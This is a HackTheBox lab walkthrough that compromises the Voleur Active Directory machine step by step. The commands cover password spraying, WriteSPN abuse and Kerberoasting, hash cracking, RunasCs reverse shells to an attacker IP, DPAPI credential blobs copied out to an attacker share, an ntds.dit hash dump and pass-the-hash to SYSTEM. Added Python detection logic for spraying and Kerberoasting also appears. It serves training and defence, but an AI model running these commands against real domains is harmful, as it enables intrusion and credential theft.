# Voleur – HackTheBox Walkthrough

**Assume Breach Scenario:**

As is common in real-life Windows pentests, you start the Voleur box with credentials for the following account: `ryan.naylor / HollowOct31Nyt`

### Scanning

```
 nmap -p- -vvv --min-rate 1000 10.129.232.130
```

* 53 (DNS)
* 88 (Kerberos)
* 135 (RPC)
* 139, 445 (SMB)
* 464 (Kerberos password change)
* 636 (LDAPS)
* 3268, 3269 (Global Catalog)
* 5985 (WinRM)

This strongly suggests an **Active Directory environment**.

Before we dive deeper into the machine, let's generate the host configuration (the `/etc/hosts` entries) with nxc:

```
└─$ nxc smb 10.129.232.130 --generate-host host
10.129.232.130     DC.voleur.htb voleur.htb DC
```

### Authentication Check

Since we have credentials, let's verify them over SMB (or LDAP):

```
nxc smb 10.129.232.130 -u ryan.naylor -p  HollowOct31Nyt
SMB         10.129.232.130  445    DC               [*]  x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
```

➡ NTLM is disabled (`NTLM:False`), so we must use **Kerberos authentication** (`-k`)

### Kerberos Authentication

```
nxc smb 10.129.232.130 -u ryan.naylor -p  HollowOct31Nyt -k
```

### Enumerating Shares

```
nxc smb 10.129.232.130 -u ryan.naylor -p  HollowOct31Nyt -k --shares
```

| Share   | Access    |
| ------- | --------- |
| Finance | No access |
| HR      | No access |
| IT      | Read      |

```
impacket-getTGT voleur.htb/ryan.naylor:HollowOct31Nyt  -dc-ip 10.129.232.130
export KRB5CCNAME=ryan.naylor.ccache
impacket-smbclient voleur.htb/ryan.naylor@dc.voleur.htb -k -no-pass
```

```
get Access_Review.xlsx
```

### Cracking xlsx with office2john

```
office2john Access_Review.xlsx > Access_Review.xlsx.hash
john Access_Review.xlsx.hash -w=/usr/share/wordlists/rockyou.txt
```

Opening the cracked xlsx file, we find a list of **usernames and passwords**.

### Enumerating Users

* Export the domain users over SMB, then add to that list the usernames from the xlsx file that the SMB enumeration did not return

```
 nxc smb 10.129.232.130 -u ryan.naylor -p  HollowOct31Nyt -k --users-export usernames
```

### Password Spray

```
nxc ldap ip -u usernames -p pass -k --continue-on-success
```

Valid credentials found:

```
svc_iis:N5pXyW1VqM7CZ8
svc_ldap:M1XyC9pW7qT5Vn
```

`todd.wolfe` returned `KDC_ERR_C_PRINCIPAL_UNKNOWN`, meaning the KDC has no such principal.\
➡ Likely a **deleted account**
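Because NTLM is disabled on this domain, a spray like the one above reaches the domain controller as Kerberos events (4768/4771) rather than 4625 logon failures. The following detection logic is an added example, not part of the original walkthrough: it runs over constructed events with simplified field names, flags a source that fails against several accounts in a short window, and separately lists principals the KDC does not know, which is what `todd.wolfe`'s `KDC_ERR_C_PRINCIPAL_UNKNOWN` looks like from the server side.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of DC security events (not real log data). Field names are
# simplified from the Windows schema: 4768 = TGT requested, 4771 = pre-auth failed.
# Status 0x18 = KDC_ERR_PREAUTH_FAILED (wrong password, account exists);
# 0x6 = KDC_ERR_C_PRINCIPAL_UNKNOWN (no such account, e.g. deleted).
EVENTS = [
    {"id": 4771, "time": "2025-01-30T09:00:01", "user": "svc_iis", "ip": "10.10.15.194", "status": "0x18"},
    {"id": 4771, "time": "2025-01-30T09:00:02", "user": "svc_ldap", "ip": "10.10.15.194", "status": "0x18"},
    {"id": 4768, "time": "2025-01-30T09:00:03", "user": "todd.wolfe", "ip": "10.10.15.194", "status": "0x6"},
    {"id": 4771, "time": "2025-01-30T09:00:04", "user": "svc_winrm", "ip": "10.10.15.194", "status": "0x18"},
    {"id": 4768, "time": "2025-01-30T09:00:05", "user": "svc_iis", "ip": "10.10.15.194", "status": "0x0"},
    {"id": 4771, "time": "2025-01-30T09:30:00", "user": "ryan.naylor", "ip": "10.10.15.50", "status": "0x18"},
]


def detect_kerberos_spray(events, min_accounts=3, window=timedelta(minutes=5)):
    """Return {source_ip: sorted accounts} for every source whose Kerberos
    failures touch at least `min_accounts` distinct accounts within `window`."""
    failures = defaultdict(list)
    for e in events:
        if e["id"] in (4768, 4771) and e["status"] != "0x0":
            failures[e["ip"]].append((datetime.fromisoformat(e["time"]), e["user"]))
    hits = {}
    for ip, items in failures.items():
        items.sort()  # sliding window over failures ordered by time
        for i, (start, _) in enumerate(items):
            users = {u for t, u in items[i:] if t - start <= window}
            if len(users) >= min_accounts:
                hits[ip] = sorted(users)
                break
    return hits


def unknown_principals(events):
    """Accounts the KDC answered 'client not found' (0x6) for: a spray run
    against a stale user list, or a probe that hit a deleted/renamed account."""
    return sorted({e["user"] for e in events if e["id"] == 4768 and e["status"] == "0x6"})
```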

### Bloodhound Data Collection

```
nxc ldap dc.voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn -k --bloodhound --collection all --dns-server 10.129.232.130
```

Looking at the outbound object control of `svc_ldap` in BloodHound, the user has **WriteSPN** over `svc_winrm`.

### ACL Abuse → Kerberoasting

```
bloodyAD -d voleur.htb -k --host dc.voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn set object svc_winrm servicePrincipalName -v 'http/l1nuxkid'

[+] svc_winrm's servicePrincipalName has been updated
```

With an SPN now set on `svc_winrm`, we can Kerberoast that account:

```
nxc ldap dc.voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn -k --kerberoasting svc_winrm.hash
```
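On the defensive side, the WriteSPN to Kerberoast chain above leaves two events on the DC: a 5136 (directory object modified, attribute `servicePrincipalName`) followed shortly by a 4769 service ticket request with RC4 encryption for the same account. This correlation is an added example, not part of the original walkthrough; it uses constructed events with simplified field names and a hypothetical one-hour correlation window.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real logs), simplified from the Windows schema.
# 5136 = directory object modified (needs Directory Service Changes auditing);
# 4769 = TGS requested. Ticket encryption 0x17 = RC4-HMAC, 0x12 = AES256.
EVENTS = [
    {"id": 5136, "time": "2025-01-30T10:00:00", "actor": "svc_ldap", "target": "svc_winrm",
     "attribute": "servicePrincipalName", "value": "http/l1nuxkid"},
    {"id": 4769, "time": "2025-01-30T10:02:30", "actor": "svc_ldap", "service": "svc_winrm",
     "etype": "0x17", "ip": "10.10.15.194"},
    {"id": 4769, "time": "2025-01-30T10:02:31", "actor": "ryan.naylor", "service": "DC$",
     "etype": "0x12", "ip": "10.129.232.130"},
    {"id": 4769, "time": "2025-01-30T15:00:00", "actor": "svc_iis", "service": "svc_winrm",
     "etype": "0x17", "ip": "10.10.15.50"},
]


def rc4_service_tickets(events):
    """TGS requests with RC4 for non-machine accounts: every Kerberoast attempt
    against a user account shows up here, so this is the first-pass signal."""
    return [e for e in events if e["id"] == 4769 and e["etype"] == "0x17"
            and not e["service"].endswith("$")]


def targeted_kerberoast(events, window=timedelta(hours=1)):
    """Correlate an SPN write (5136) on an account with an RC4 ticket request
    (4769) for that same account inside `window`. This is the WriteSPN -> roast
    chain and deserves higher severity than a plain roast of a long-standing SPN."""
    spn_writes = [e for e in events if e["id"] == 5136 and e["attribute"] == "servicePrincipalName"]
    alerts = []
    for t in rc4_service_tickets(events):
        t_time = datetime.fromisoformat(t["time"])
        for w in spn_writes:
            w_time = datetime.fromisoformat(w["time"])
            if w["target"] == t["service"] and timedelta(0) <= t_time - w_time <= window:
                alerts.append({"account": t["service"], "spn_set_by": w["actor"],
                               "requested_by": t["actor"], "from": t["ip"]})
    return alerts
```

The later `svc_iis` request is still reported by `rc4_service_tickets` but not by `targeted_kerberoast`, because it falls outside the window after the SPN write.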

### Cracking Service hash

```
 hashcat svc_winrm.hash  /usr/share/wordlists/rockyou.txt
```

```
svc_winrm : AFireInsidedeOzarctica980219afi
```

### Shell as svc\_winrm

```
impacket-getTGT voleur.htb/svc_winrm:AFireInsidedeOzarctica980219afi -dc-ip 10.129.232.130
export KRB5CCNAME=svc_winrm.ccache
```

```
evil-winrm -i dc.voleur.htb -r voleur.htb
```

### Recycle Bin

```
 cmd /c dir /A
 Volume in drive C has no label.
 Volume Serial Number is A5C3-6454

 Directory of C:\

01/30/2025  04:39 AM    <DIR>          $Recycle.Bin
```

```
Get-ADOptionalFeature 'Recycle Bin Feature'
```

I am currently logged in as svc\_winrm, but as we saw in BloodHound, svc\_ldap is a member of the restore\_users group, so to enumerate or restore the deleted user we need to be logged in as that account.

### Switch to svc\_ldap or Shell as svc\_ldap

Using RunasCs.exe:

```
./RunasCs.exe svc_ldap M1XyC9pW7qT5Vn powershell -r 10.10.15.194:135
```

### Restore Deleted User

```
Get-ADObject -Filter 'isDeleted -eq $true -and ObjectClass -eq "user"' -IncludeDeletedObjects | ft Name, DistinguishedName
```

```
Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects

ObjectGUID        : 1c6b1deb-c372-4cbb-87b1-15031de169db
```

```
Restore-ADObject -Identity 1c6b1deb-c372-4cbb-87b1-15031de169db
```

Now that we have recovered this user, remember that we found todd.wolfe's password in the xlsx file? At that time we got an unknown-principal error; now the account exists again.

### Shell as todd.wolfe

```
nxc smb dc.voleur.htb -u todd.wolfe -p NightT1meP1dg3on14 -k 
```

todd.wolfe does not have WinRM access, but we can use the same RunasCs.exe:

```
 ./RunasCs.exe todd.wolfe NightT1meP1dg3on14  powershell -r 10.10.15.194:139
```

There's a folder under `C:\IT` that I can now access, and it has a `todd.wolfe` directory:

There are no useful visible files, but looking for DPAPI material, the master key is there.

### DPAPI Decryption

There was nothing of interest in the non-hidden directories. However, a stored credential was found in the `AppData` directory.

```
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe> ls AppData\Roaming\Microsoft\Credentials
```

The common locations for DPAPI master keys:

```powershell
Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect
Get-ChildItem -Hidden C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\USER\AppData\Roaming\Microsoft\Protect\{SID}
Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\{SID}
```

Found the master key:

```
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe> ls AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110
```

Transfer the credential blob and the master key to our share:

```
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe> copy AppData\Roaming\Microsoft\Credentials\772275FAD58525253490A9B0039791D3 \\10.10.15.194\share
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe> copy AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110\08949382-134f-4c63-b93c-ce52efc0aa88  \\10.10.15.194\share
```

* Decrypt the master key with the user's password and SID, then use the resulting key on the credential blob

```
dpapi.py masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -sid S-1-5-21-3927696377-1337352550-2781715495-1110 -password NightT1meP1dg3on14
```

```
dpapi.py credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
```

### Shell as jeremy.combs

At this stage, `jeremy.combs` was identified as a member of the **Third-Line Technicians** group.

```
impacket-getTGT voleur.htb/jeremy.combs:'qT3V9pLXyN7W4m' -dc-ip 10.129.32.134
export KRB5CCNAME=jeremy.combs.ccache
evil-winrm -i dc.voleur.htb -r voleur.htb
```

We then revisited the open ports and noticed that port `2222` was running SSH on Ubuntu. Additionally, an `id_rsa` file was discovered.

```
*Evil-WinRM* PS C:\IT\Third-Line Support> dir
    Directory: C:\IT\Third-Line Support

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         1/30/2025   8:11 AM                Backups
-a----         1/30/2025   8:10 AM           2602 id_rsa
-a----         1/30/2025   8:07 AM            186 Note.txt.txt
```

```
*Evil-WinRM* PS C:\IT\Third-Line Support> type n*
Jeremy,

I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux.

Please see what you can set up.

Thanks,
```

The `id_rsa` key did not work for the `jeremy.combs` user, but it successfully authenticated as the `svc_backup` user.

Although there was not much of interest in the current directory, the `C:` drive was mounted under `/mnt`.

From there, the `Backups` directory was readable, a directory that `jeremy.combs` could not previously access.

```
svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups$ ls
'Active Directory'   registry
```

The backup directory contained the following sensitive files:

* `SECURITY`
* `SYSTEM`
* `ntds.dit`

### Dumping the Hashes

```
$ secretsdump.py LOCAL -system SYSTEM -security SECURITY -ntds ntds.dit
```

### Shell as `NT AUTHORITY\SYSTEM`

Using the dumped Administrator hash, a shell was obtained as `NT AUTHORITY\SYSTEM` with the psexec command below:

```
psexec.py voleur.htb/administrator@dc.voleur.htb -no-pass -hashes :e656e07c56d831611b577b160b259ad2 -k
```
